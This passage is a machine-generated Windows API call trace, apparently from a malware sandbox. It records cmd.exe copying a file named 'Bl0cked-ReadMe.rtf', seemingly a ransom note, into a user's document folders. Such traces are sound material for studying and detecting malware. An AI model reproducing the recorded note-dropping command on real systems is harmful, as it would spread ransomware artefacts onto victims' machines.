Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0141.962] GetConsoleOutputCP () returned 0x1b5 [0141.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.962] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.963] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.963] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.963] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.963] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.963] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.963] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.963] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.963] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.964] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.964] GetEnvironmentStringsW () returned 0x370198* [0141.964] FreeEnvironmentStringsW (penv=0x370198) returned 1 [0141.964] GetEnvironmentStringsW () returned 0x370198* [0141.964] FreeEnvironmentStringsW (penv=0x370198) returned 1 [0141.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecb4 | out: phkResult=0x2cecb4*=0x40) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecbc, 
lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0xc0, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x0, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegCloseKey (hKey=0x40) returned 0x0 [0141.967] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecb4 | out: phkResult=0x2cecb4*=0x40) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, 
lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x0, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x9, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x9, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x9, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegCloseKey (hKey=0x40) returned 0x0 [0141.967] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.967] srand (_Seed=0x5b886370) [0141.967] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.967] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.967] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.968] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.968] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.968] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.968] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.968] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.968] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.968] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.968] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.968] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.968] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.968] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.968] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.968] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.969] GetEnvironmentStringsW () returned 0x3722e8* [0141.969] FreeEnvironmentStringsW (penv=0x3722e8) returned 1 [0141.969] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.969] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 
0x0 [0141.969] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.969] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.969] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.969] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.969] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.969] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.969] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.969] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.969] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfa80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.969] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfa80, lpFilePart=0x2cfa7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfa7c*="Desktop") returned 0x18 [0141.969] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.969] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf7fc | out: lpFindFileData=0x2cf7fc) returned 0x370028 [0141.969] FindClose (in: hFindFile=0x370028 | out: hFindFile=0x370028) returned 1 [0141.970] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf7fc | out: lpFindFileData=0x2cf7fc) returned 0x370028 [0141.970] FindClose (in: hFindFile=0x370028 | out: hFindFile=0x370028) returned 1 [0141.970] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf7fc | out: lpFindFileData=0x2cf7fc) returned 0x370028 [0141.970] FindClose (in: hFindFile=0x370028 | out: hFindFile=0x370028) returned 1 [0141.970] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.970] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 
[0141.970] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.970] GetEnvironmentStringsW () returned 0x372b08* [0141.970] FreeEnvironmentStringsW (penv=0x372b08) returned 1 [0141.971] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.971] GetConsoleOutputCP () returned 0x1b5 [0141.971] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.971] GetUserDefaultLCID () returned 0x409 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfbc0, cchData=128 | out: lpLCData="0") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfbc0, cchData=128 | out: lpLCData="0") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfbc0, cchData=128 | out: lpLCData="1") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: 
lpLCData="Sun") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.972] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.973] GetConsoleTitleW (in: lpConsoleTitle=0x3608f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.325] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.325] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.325] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.325] _wcsicmp (_String1="type", _String2=")") returned 75 [0142.325] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0142.326] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0142.326] _wcsicmp (_String1="IF", _String2="type") returned -11 [0142.326] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0142.326] _wcsicmp (_String1="REM", _String2="type") returned -2 [0142.326] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0142.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.329] GetFileType (hFile=0x7) returned 0x2 [0142.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.329] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cfab8 | out: lpMode=0x2cfab8) returned 1 [0142.330] _dup (_FileHandle=1) returned 3 [0142.330] _close (_FileHandle=1) returned 0 [0142.330] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.330] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cfa88, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.553] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.553] GetConsoleTitleW (in: lpConsoleTitle=0x2cf8b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.553] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.553] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.553] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.553] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.554] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf41c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf41c) returned 0x360e90 [0142.555] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.555] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.555] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce328, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.555] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] GetFileType 
(hFile=0x54) returned 0x1 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce380 | out: lpFileSizeHigh=0x2ce380*=0x0) returned 0x1632 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.555] GetFileType (hFile=0x4c) returned 0x1 [0142.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.556] GetFileType (hFile=0x4c) returned 0x1 [0142.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.558] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.558] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, 
lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 
| out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.559] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.559] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle 
